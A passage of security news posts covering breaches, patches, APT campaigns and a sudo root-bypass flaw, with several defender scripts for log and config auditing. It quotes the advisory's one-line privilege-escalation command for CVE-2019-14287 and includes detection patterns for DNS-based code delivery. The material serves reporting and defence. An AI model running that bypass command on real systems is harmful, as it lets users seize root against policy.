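    """Parse the whitespace-separated log above into dicts; blank and '#' lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, client, qname, qtype, rcode, alen = line.split()
        records.append({"ts": int(ts), "client": client, "qname": qname.lower(),
                        "qtype": qtype.upper(), "rcode": rcode, "answer_len": int(alen)})
    return records


def flag_txt_script_delivery(records: list, min_answer_len: int = 512,
                             min_repeats: int = 2, min_txt_ratio: float = 0.5) -> dict:
    """Return {client: [reasons]} for clients that look like they pull code over DNS.

    - a TXT answer of min_answer_len+ bytes is far larger than SPF/DMARC/DKIM records;
    - the same TXT name resolved min_repeats+ times is a polling loop (the dropper
      re-fetches its scripts);
    - a client whose queries are mostly TXT is using DNS as a download channel."""
    per_client = defaultdict(list)
    for r in records:
        per_client[r["client"]].append(r)

    findings = {}
    for client, recs in per_client.items():
        reasons = []
        txt = [r for r in recs if r["qtype"] == "TXT"]
        for name in sorted({r["qname"] for r in txt if r["answer_len"] >= min_answer_len}):
            reasons.append(f"oversized TXT answer for {name}")
        counts = defaultdict(int)
        for r in txt:
            counts[r["qname"]] += 1
        for name, n in sorted(counts.items()):
            if n >= min_repeats:
                reasons.append(f"TXT for {name} queried {n} times")
        if len(txt) >= min_repeats and len(txt) / len(recs) >= min_txt_ratio:
            reasons.append(f"{len(txt)}/{len(recs)} queries are TXT")
        if reasons:
            findings[client] = reasons
    return findings


def run(text: str = SAMPLE_DNS_LOG) -> dict:
    """Parse and evaluate one log text."""
    return flag_txt_script_delivery(parse_dns_log(text))


if __name__ == "__main__":
    for client, reasons in run().items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```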

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

The post Chinese-speaking cybercrime gang Rocke changes tactics appeared first on Security Affairs.

Adobe out-of-band security updates address 82 flaws in 3 products

Adobe has released out-of-band security updates to address a total of 82 security vulnerabilities that affect three products of the company.

On Tuesday, Adobe released out-of-band security updates to address 82 flaws in Acrobat and Reader, Experience Manager, Experience Manager Forms, and Download Manager.

Out of 82 security flaws, 45 vulnerabilities affecting Adobe Acrobat and Reader have been rated critical. The exploitation of the flaws could lead to arbitrary code execution in the context of the current user.

The company also addressed 23 important-rated out-of-bounds read and cross-site scripting issues that could lead to information disclosure.

A majority of critical-rated vulnerabilities (i.e., 26) in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 due to untrusted pointer dereference, 3 are heap overflow bugs, one buffer overrun and one race condition issue.

Adobe fixed a privilege escalation flaw in Download Manager for Windows that is caused by insecure file permissions.

Adobe also addressed a dozen flaws in the Experience Manager marketing solution. An attacker could exploit the vulnerabilities to gain unauthorized access to an organization’s Experience Manager environment.

The company also fixed an XSS flaw in Experience Manager Forms that could lead to the disclosure of sensitive information.

The good news is that Adobe is not aware of any attacks exploiting the vulnerabilities in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, security updates)

The post Adobe out-of-band security updates address 82 flaws in 3 products appeared first on Security Affairs.

Click2Mail suffered a data breach that potentially impacts 200,000 registrants

Click2Mail.com, a US Postal Service affiliate partner, has suffered a data breach that exposed the personal information of its users.

The US Postal Service affiliate partner Click2Mail has suffered a data breach that exposed the personal information of its users.

The company allows its users to professionally print letters, flyers or postcards and deliver them in a business day at low prices.

It also allows users to manage mailing lists conveniently through the web browser. The company is sending out data breach notices to its impacted users.

The incident was first reported by DataBreaches.net, which was contacted by a former customer of Click2Mail who reported their suspicion that Click2Mail may have been hacked. The security breach was discovered on October 4, 2019.

Exposed users’ data include name, organization name, account mailing address, email address, and phone number. The company pointed out that it doesn’t store users’ financial data.

“We have learned that your personal information, including name, organization name, account mailing address, email address, and phone number may have been compromised.” reads the data breach notice sent to the users. “On October 4th, 2019 it was discovered that registered Click2Mail users’ names and email addresses were being used by unknown parties to send multiple spam emails. Technical analysis of our systems detected an intrusion point that was closed that same day.”

The company hired a cyber-security firm to help its staff in investigating the incident.

Lee Garvey, President and CEO of Click2Mail, confirmed that the company is going to notify its 200,000 Click2Mail.com registrants of the incident.

“In a follow-up communication, Lee Garvey, President and CEO of Click2Mail, informs this site that slightly more than 200,000 Click2Mail.com registrants will be receiving notifications, which will be sent out in segments, not all at once.” states a post published on databreaches.net. “Garvey also explained that prior to receiving this site’s email inquiry, they had received an email from a helpful customer who had used a tagged email address and was getting spam.  From the description, it sounds like the same former customer who contacted this site to alert us to their suspicions that Click2Mail had been hacked.”

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Click2Mail suffered a data breach that potentially impacts 200,000 registrants appeared first on Security Affairs.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and caused a partial system outage that made some of its services unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even if its customers will not be able to refill their postage meters until the systems are restored, they will still be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, the impacted solutions include Fulfillment, Delivery and Returns, and Presort services.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

sudo flaw allows any users to run commands as Root on Linux

Experts discovered a security policy bypass issue in the Sudo utility that is installed as a command on almost every Linux and Unix system.

The Sudo utility that is installed as a command on almost every Linux and Unix system is affected by a security policy bypass issue tracked as CVE-2019-14287.

The vulnerability could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the “sudoers configuration” disallows the root access.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

“When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.” reads the security advisory.

“This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.

Log entries for commands run this way will list the target user as 4294967295 instead of root. In addition, PAM session modules will not be run for the command.”

Unlike the su command, users must, by default, supply their password for authentication, rather than the password of the target user. Once authenticated, and if the configuration file (/etc/sudoers) permits the user access, the system will invoke the requested command. 

Administrators can configure the sudoers file to define which users are allowed to run which commands, and as which target users.

Now, due to the CVE-2019-14287 flaw, even if a user is not allowed to run a specific command as root, it is possible to bypass the restriction.

An attacker could exploit the vulnerability to run commands as root just by specifying the user ID “-1” or “4294967295.” This is possible because the function that converts user id into its username incorrectly handles the ‘-1’ value, or its unsigned equivalent 4294967295, and interprets it as 0, which is always associated with user ID of root user.

“Fixed CVE-2019-14287, a bug where a sudo user may be able to run a command as root when the Runas specification explicitly disallows root access as long as the ALL keyword is listed first.” states the advisory.

So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and completely take over the system.

“Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.” continues the advisory.

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. For example, given the following sudoers entry:

    myhost bob = (ALL, !root) /usr/bin/vi

User bob is allowed to run vi as any user but root. However, due to the bug, bob is actually able to run vi as root by running sudo -u#-1 vi, violating the security policy.”

The CVE-2019-14287 vulnerability was discovered by Joe Vennix of Apple Information Security; it affects Sudo versions prior to 1.8.28.

Linux users are urged to update the sudo package to the latest version as soon as it is available.
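The advisory quoted above gives a defender three concrete things to check: the installed version, the Runas pattern that the bug bypasses, and the tell-tale target user 4294967295 in the logs. The following script is an added example (not code from the sudo project or from this post) that turns those three observations into an audit. The syslog line layout it parses is an assumption modelled on sudo's default logging, and the sudoers fragment and log lines are constructed; the `bob` entry is the advisory's own example.

```python
"""Audit helpers for CVE-2019-14287 (sudo before 1.8.28).

Added example for this post; it is not code from the sudo project or from
Security Affairs. Three defender-side checks that follow from the advisory:
  1. is the installed sudo older than the fixed release 1.8.28?
  2. does a sudoers Runas specification list ALL first and then exclude root,
     e.g. "(ALL, !root)", the pattern the bug bypasses?
  3. do sudo log entries show the target user as 4294967295 (or -1), the value
     the advisory says is logged instead of "root" for commands run this way?
The syslog line layout used for check 3 is an assumption modelled on sudo's
default logging; all sample data below is constructed.
"""
import json
import re
from typing import List, Tuple

FIXED_VERSION = (1, 8, 28)


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn 'Sudo version 1.8.27p1' (first line of `sudo -V`) into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text: str) -> bool:
    """True for any release before 1.8.28 (patch levels such as 1.8.27p1 still count)."""
    return parse_version(text) < FIXED_VERSION


# A Runas list that begins with ALL and later negates root: "(ALL, !root)" or "(ALL, !root : ALL)".
# "(!root, ALL)" does not match, because the advisory says ALL must be listed first.
RUNAS_RE = re.compile(r"\(\s*ALL\s*,[^)]*!\s*root\b[^)]*\)")


def vulnerable_runas_entries(sudoers: str) -> List[str]:
    """Return the sudoers lines whose Runas spec starts with ALL and excludes root."""
    hits = []
    for line in sudoers.splitlines():
        stripped = line.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if stripped and RUNAS_RE.search(stripped):
            hits.append(stripped)
    return hits


BAD_TARGETS = {"4294967295", "-1"}
# Assumed layout: "<ts> <host> sudo: <invoker> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
# An unknown uid is written as "#<number>", so the leading "#" is stripped before comparing.
LOG_RE = re.compile(
    r"sudo:\s+(?P<invoker>\S+)\s+:.*?USER=(?P<target>[^\s;]+)\s*;\s*COMMAND=(?P<cmd>.+)$"
)


def suspicious_log_entries(log: str) -> List[dict]:
    """Flag log lines where the target user is uid -1 / 4294967295 rather than a real account."""
    hits = []
    for line in log.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target").lstrip("#")
        if target in BAD_TARGETS:
            hits.append({"invoker": m.group("invoker"), "target": target, "command": m.group("cmd").strip()})
    return hits


def audit(version_text: str, sudoers: str, log: str) -> dict:
    """Combine the three checks into one report."""
    return {
        "vulnerable_version": is_vulnerable_version(version_text),
        "risky_runas": vulnerable_runas_entries(sudoers),
        "suspicious_log": suspicious_log_entries(log),
    }


# Constructed sample inputs (the bob entry is the advisory's own example).
SAMPLE_SUDOERS = """\
# constructed sudoers fragment
root    ALL=(ALL:ALL) ALL
myhost  bob = (ALL, !root) /usr/bin/vi
myhost  alice = (www-data) /usr/bin/systemctl restart nginx
myhost  carol = (!root, ALL) /usr/bin/less
"""
SAMPLE_LOG = """\
Oct 14 10:02:11 myhost sudo:      bob : TTY=pts/0 ; PWD=/home/bob ; USER=#4294967295 ; COMMAND=/usr/bin/vi
Oct 14 10:03:40 myhost sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=www-data ; COMMAND=/usr/bin/systemctl restart nginx
Oct 14 10:05:02 myhost sudo:     root : TTY=pts/2 ; PWD=/root ; USER=postgres ; COMMAND=/usr/bin/psql
"""

if __name__ == "__main__":
    print(json.dumps(audit("Sudo version 1.8.27", SAMPLE_SUDOERS, SAMPLE_LOG), indent=2))
```

On a real host, feed `audit()` the first line of `sudo -V`, the contents of `/etc/sudoers` (and anything it includes), and the relevant syslog or auth.log excerpt. Only the `bob` entry is reported as risky: `carol`'s `(!root, ALL)` lists the exclusion first, which the advisory says is not affected.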

Pierluigi Paganini

(SecurityAffairs – Linux, Sudo)

The post sudo flaw allows any users to run commands as Root on Linux appeared first on Security Affairs.

Winnti Group was planning a devastating supply-chain attack against Asian manufacturer

Winnti Group is back with a new modular Win backdoor that was used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Security experts at ESET revealed that the Winnti Group continues to update its arsenal: they observed the China-linked APT group using a new modular Windows backdoor to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Researchers also discovered that the APT group used an updated version of its ShadowPad malware. The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad.

Experts analyzed recent supply chain attacks against the gaming industry in Asia and noticed the use of a unique packer in a backdoor dubbed PortReuse.

“After analyzing the custom packer used by the Winnti Group, we started hunting for more executable files with this packer, in the hope of unearthing other compromised software used in supply-chain attacks. What we’ve found is not exactly what we were looking for to begin with. Instead of finding compromised software, we discovered a new listening-mode modular backdoor that uses the same packer. We believe its author calls it PortReuse.” reads the paper published by ESET. “This is not a random name: this backdoor injects into a running process already listening on a TCP port, “reusing” an already open port. It hooks the receiving function and waits for a “magic” packet to trigger the malicious behavior. The legitimate traffic is forwarded to the real application, so it is effectively not blocking any legitimate activity on the compromised server. This type of backdoor is sometimes called a passive network implant.”

In the attack against a video game developer, the malware was being distributed via a game’s official update server.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

The backdoor malware is being served in the following ways:

  • Embedded in a .NET application launching the initial Winnti packer;
  • In a VB script that invokes a .NET object that launches the packer;
  • In an executable that has the packer directly at the entry point;

PortReuse doesn’t need command and control (C2) servers; instead, it relies on the NetAgent listening on open sockets. The attacker only needs to connect directly to the compromised host.

“The PortReuse backdoor does not use a C&C server; it waits for an incoming connection that sends a “magic” packet. To do so, it doesn’t open an additional TCP port; it injects into an existing process to “reuse” a port that is already open. To be able to parse incoming data to search for the magic packet, two techniques are used: hooking of the receiving function (WSARecv or even the lower level NtDeviceIoControlFile) or registering a handler for a specific URL resource on an IIS server using HttpAddUrl with a URLPrefix.” continues the analysis.

ESET was able to identify one company that was hit by a variant of the PortReuse backdoor that injects itself within Microsoft IIS using a “GET request and inspecting the Server and Content-Length headers.” Using the Censys search engine the experts discovered eight infected machines belonging to the same organization having indicators of compromise that were matching the PortReuse infection.

The organization is a major mobile hardware and software manufacturer based in Asia; the experts contacted it to alert the company of the infection.

“It is possible that the Winnti Group was planning a devastating supply-chain attack by compromising this organization,” concludes the analysis.

“The Winnti Group is still very active in 2019 and continues to target both gaming and other industries. The update to the ShadowPad malware shows they are still developing and using it. The relatively new PortReuse malware also shows they update their arsenal and give themselves an additional way to compromise their victims for a long period of time.”

Pierluigi Paganini

(SecurityAffairs – Winnti, malware)

The post Winnti Group was planning a devastating supply-chain attack against Asian manufacturer appeared first on Security Affairs.

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple, most of its users likely ignore that the company is sharing iOS web browsing data on some of them to Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying: starting from at least iOS 12.2, Apple has integrated “Tencent Safe Browsing” to improve the security of its users and protect them from fraudulent websites. Tencent Safe Browsing does so through the “Fraudulent Website Warning” feature of the Safari web browser, which on both iOS and macOS checks every site users visit.

The service leverages a blacklist of malicious websites that is continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to learn something about the websites users visit, and they may also log the users’ IP addresses. At this time, it’s not clear whether Tencent is also collecting IP addresses from users residing outside of China; most likely the Tencent blacklist is only provided to Chinese users, because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.
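Apple's wording, “information calculated from the website address”, describes a hash-prefix lookup. The script below is an added example (not Apple's, Google's or Tencent's code) that models the general hash-prefix design used by Google Safe Browsing: the client hashes a canonical form of the URL with SHA-256 and sends only the first four bytes, the provider returns the full hashes that share that prefix, and the browser compares locally. Whether Tencent's service works the same way is an assumption; the blocklist entries and the client address are constructed. The point it makes visible is what the provider can still retain: a four-byte prefix per visited page, plus the client's IP address.

```python
"""What a hash-prefix safe browsing check sends to the provider.

Added example for this post; it is not Apple's, Google's or Tencent's code. It
models the general hash-prefix design used by Google Safe Browsing (v4): the
client hashes a canonical form of the URL with SHA-256 and sends only the first
four bytes; the provider returns the full hashes matching that prefix and the
browser compares locally. Whether Tencent's service works the same way is an
assumption; the blocklist entries and client address below are constructed.
"""
import hashlib
from typing import List, Tuple
from urllib.parse import urlsplit

PREFIX_LEN = 4


def canonical_expression(url: str) -> str:
    """Simplified canonicalization: lower-case host plus path, no scheme, port, query or fragment."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return f"{(parts.hostname or '').lower()}{parts.path or '/'}"


def full_hash(url: str) -> bytes:
    return hashlib.sha256(canonical_expression(url).encode()).digest()


def hash_prefix(url: str) -> bytes:
    """The only URL-derived value that leaves the device."""
    return full_hash(url)[:PREFIX_LEN]


class Provider:
    """Simulated safe-browsing backend: holds full hashes of known bad URLs and a request log."""

    def __init__(self, bad_urls: List[str]):
        self.blocklist = {full_hash(u) for u in bad_urls}
        # (client IP, prefix hex): what the provider is in a position to retain
        self.request_log: List[Tuple[str, str]] = []

    def lookup(self, prefix: bytes, client_ip: str) -> List[bytes]:
        self.request_log.append((client_ip, prefix.hex()))
        return [h for h in self.blocklist if h.startswith(prefix)]


def is_fraudulent(url: str, provider: Provider, client_ip: str) -> bool:
    """Client side: send the prefix, then compare the returned full hashes locally."""
    candidates = provider.lookup(hash_prefix(url), client_ip)
    return full_hash(url) in candidates


# Constructed provider and traffic.
PROVIDER = Provider(["evil.example/login", "phish.example/secure/update"])

if __name__ == "__main__":
    for u in ["https://evil.example/login", "https://news.example/article?id=7"]:
        print(u, "->", "blocked" if is_fraudulent(u, PROVIDER, "203.0.113.5") else "ok")
    print("provider saw:", PROVIDER.request_log)
```

A four-byte prefix does not identify a page on its own, but combined with timing, the IP address and a large enough history it narrows the set of candidates considerably, which is why the logging of IP addresses is the part privacy advocates object to.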

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that users must be notified of major changes of this kind.

The good news is that users can turn off the Fraudulent Website Warning feature in Safari, even though doing so potentially exposes them to online threats.

The feature is enabled by default on iPhones and iPads running iOS 13; below are the instructions to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

Imperva explains how hackers stole AWS API Key and accessed to customer data

Imperva shared details on the incident it recently suffered and on how hackers obtained data on Cloud Web Application Firewall (WAF) customers.

In August, cybersecurity firm Imperva disclosed a data breach that exposed sensitive information for some customers of its Cloud Web Application Firewall (WAF) product, formerly known as Incapsula.

Incapsula is a CDN service designed to protect customers’ websites from a wide range of threats and to mitigate DDoS attacks.

Imperva CEO Chris Hylen revealed that the company learned about the incident on August 20, 2019, when it was informed about the data exposure impacting Cloud Web Application Firewall (WAF) product.

“We want to be very clear that this data exposure is limited to our Cloud WAF product.” reads Hylen’s announcement. “Here is what we know about the situation today:

  • On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017.
  • Elements of our Incapsula customer database through September 15, 2017 were exposed. These included:
    • email addresses
    • hashed and salted passwords

Leaked data included email addresses and hashed and salted passwords for all Cloud WAF customers who registered before September 15, 2017.

Hylen added that, for a subset of Incapsula customers through September 15, 2017, API keys and customer-provided SSL certificates were also exposed.

In a blog post published by Imperva, the company confirmed that it was informed of the incident by someone who had requested a bug bounty. The firm explained that the data was exfiltrated without exploiting any vulnerability in its systems.

The analysis of the data confirmed that the attackers stole it in October 2018.

“Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords.” reads the post published by Imperva.

“We compared the SQL dump in the provided dataset to our snapshots and found a match. As of this post, we can say that the elements of customer data defined above were limited to Cloud WAF accounts prior and up to September 15, 2017. Databases and snapshots for our other product offerings were not exfiltrated.”

The company announced that it has adopted additional security measures to protect its customers, including placing new instances behind its VPN by default, implementing monitoring and patching programs, and decommissioning unused and non-critical compute instances.

Imperva explained that the incident was related to the migration of its infrastructure to AWS cloud technologies, which began back in 2017.

At the time, the development team created a database snapshot for testing and to evaluate the migration to AWS. An internal compute instance that they created was exposed online and it contained an AWS API key. This instance was compromised and hackers exfiltrated the AWS API key and used it to access the snapshot.
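Imperva's account, a long-lived administrative key lifted from an exposed instance and then used to reach a database snapshot, is the kind of activity CloudTrail records. The following script is an added example (not Imperva's code; the post names neither the database service nor the API calls involved) showing the detection a defender could run over CloudTrail: it assumes the snapshot was an RDS database snapshot and flags snapshot-related RDS calls whose source IP falls outside the organisation's known egress ranges, as well as calls that grant other AWS accounts restore access to a snapshot. The CloudTrail records and the corporate IP range are constructed; the key id is AWS's documentation example key, not a real credential.

```python
"""Spotting unauthorized snapshot access in CloudTrail.

Added example for this post; it is not Imperva's code. Assumes the snapshot was
an RDS database snapshot (the post does not say) and flags snapshot-related RDS
calls made from a source IP outside the organisation's known egress ranges, or
calls that grant other AWS accounts restore access to a snapshot. The records
and the corporate IP range are constructed; the access key id is AWS's
documentation example key.
"""
import ipaddress
import json
from typing import Iterable, List

SNAPSHOT_EVENTS = {
    "CreateDBSnapshot",
    "CopyDBSnapshot",
    "DescribeDBSnapshots",
    "ModifyDBSnapshotAttribute",
    "RestoreDBInstanceFromDBSnapshot",
}

# Assumed corporate egress range (constructed, RFC 5737 documentation prefix).
KNOWN_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]


def from_known_network(source: str) -> bool:
    """True for known corporate IPs and for AWS-service-initiated calls, whose
    sourceIPAddress is a service hostname such as 'rds.amazonaws.com'."""
    try:
        addr = ipaddress.ip_address(source)
    except ValueError:
        return source.endswith(".amazonaws.com")
    return any(addr in net for net in KNOWN_NETWORKS)


def shared_with(record: dict) -> List[str]:
    """Accounts (or 'all' for public) given restore access by ModifyDBSnapshotAttribute."""
    if record.get("eventName") != "ModifyDBSnapshotAttribute":
        return []
    params = record.get("requestParameters") or {}
    if params.get("attributeName") != "restore":
        return []
    return list(params.get("valuesToAdd") or [])


def suspicious_snapshot_calls(records: Iterable[dict]) -> List[dict]:
    """Return one finding per snapshot-related RDS call that looks out of place."""
    findings = []
    for r in records:
        if r.get("eventSource") != "rds.amazonaws.com" or r.get("eventName") not in SNAPSHOT_EVENTS:
            continue
        reasons = []
        if not from_known_network(r.get("sourceIPAddress", "")):
            reasons.append("source IP outside known networks")
        grantees = shared_with(r)
        if grantees:
            reasons.append("snapshot restore access granted to: " + ", ".join(grantees))
        if reasons:
            findings.append({
                "time": r.get("eventTime"),
                "accessKeyId": (r.get("userIdentity") or {}).get("accessKeyId"),
                "event": r["eventName"],
                "sourceIP": r.get("sourceIPAddress"),
                "reasons": reasons,
            })
    return findings


# Constructed CloudTrail records (field names follow the CloudTrail schema).
SAMPLE_TRAIL = json.loads("""
[
 {"eventTime": "2018-10-05T02:13:44Z", "eventSource": "rds.amazonaws.com",
  "eventName": "DescribeDBSnapshots", "sourceIPAddress": "198.51.100.20",
  "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
 {"eventTime": "2018-10-05T02:15:10Z", "eventSource": "rds.amazonaws.com",
  "eventName": "CopyDBSnapshot", "sourceIPAddress": "203.0.113.77",
  "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
  "requestParameters": {"sourceDBSnapshotIdentifier": "migration-test-snapshot"}},
 {"eventTime": "2018-10-05T02:16:02Z", "eventSource": "rds.amazonaws.com",
  "eventName": "ModifyDBSnapshotAttribute", "sourceIPAddress": "203.0.113.77",
  "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
  "requestParameters": {"dBSnapshotIdentifier": "migration-test-snapshot",
                        "attributeName": "restore", "valuesToAdd": ["111122223333"]}},
 {"eventTime": "2018-10-05T03:00:00Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "DescribeInstances", "sourceIPAddress": "198.51.100.20",
  "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}}
]
""")

if __name__ == "__main__":
    for f in suspicious_snapshot_calls(SAMPLE_TRAIL):
        print(json.dumps(f))
```

The same access key appears in every record, which is the point: a long-lived key used from an unexpected network, or used to share a snapshot outside the account, is the signal, not the identity behind it. Short-lived role credentials and instances kept off the public Internet, two of the measures Imperva lists, remove the precondition for this kind of misuse.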

In response to the incident, Imperva reset 13,000 passwords, rotated more than 13,500 SSL certificates, and regenerated roughly 1,400 API keys. The good news is that the company is not aware of any malicious account activity associated with the hack.

While the company is still investigating the incident it recommends the following security measures to its customers:

Pierluigi Paganini

(SecurityAffairs – Imperva, hacking)

The post Imperva explains how hackers stole AWS API Key and accessed to customer data appeared first on Security Affairs.

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The only model affected by all the vulnerabilities is the M580 PLC. The flaws affect the implementations of the Modbus, FTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities, including those in TFTP and the REST API, are tracked with identifiers between CVE-2019-6841 and CVE-2019-6851; an attacker could exploit them by sending specially crafted requests to the impacted devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

REST API is affected by three vulnerabilities, CVE-2019-6848, CVE-2019-6849, CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing exploitation of the issues. The Talos blog post also includes Snort rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

The post Talos experts found 11 flaws in Schneider Electric Modicon Controllers appeared first on Security Affairs.

Charming Kitten Campaign involved new impersonation methods

Iran-linked APT group Charming Kitten employed new spear-phishing methods in attacks carried out between August and September.

Security experts at ClearSky analyzed attacks recently uncovered by Microsoft that targeted a US presidential candidate, government officials, journalists, and prominent expatriate Iranians. Microsoft Threat Intelligence Center (MSTIC) observed the APT group making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.

ClearSky researchers pointed out that these attacks represent a shift in the group’s tactics, because this is the first time that the Charming Kitten group has attempted to interfere in the elections of a foreign country.

The experts said, with medium-high confidence, that the campaign uncovered by Microsoft is the same campaign they observed over the past several months.

“We evaluate in a medium-high level of confidence, that Microsoft’s discovery and our findings in our previous and existing reports is a congruent operation” reads the report published by ClearSky, “based on the following issues:

  • Same victim profiles
  • Time overlapping
  • Similar attack vectors”

The Iran-linked Charming Kitten group (aka APT35, Phosphorus, Newscaster, and Ajax Security Team) made the headlines in 2014, when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actor at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011.

As part of the recently observed campaign, the state-sponsored hackers used three different spear-phishing methods:

  • Sending an email message leveraging social engineering methods.
